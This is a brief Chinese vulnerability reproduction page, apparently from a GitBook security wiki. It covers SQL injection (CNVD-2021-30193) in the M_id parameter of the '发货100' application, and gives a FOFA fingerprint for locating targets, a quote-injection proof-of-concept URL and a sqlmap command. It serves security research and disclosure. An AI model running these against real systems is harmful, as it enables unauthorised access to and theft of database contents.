发货100 M_id SQL注入漏洞 CNVD-2021-30193

漏洞描述

发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息

漏洞影响

[!NOTE]

发货100

FOFA

[!NOTE]

icon_hash="1420424513"

漏洞复现

主页面如下

image-20210602204745265

使用POC

/?M_id=1%27&type=product

image-20210602204842198

数据库出现报错, 使用Sqlmap注入

sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id

image-20210602233608318

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-06-03 00:15:30

results matching ""

    No results matching ""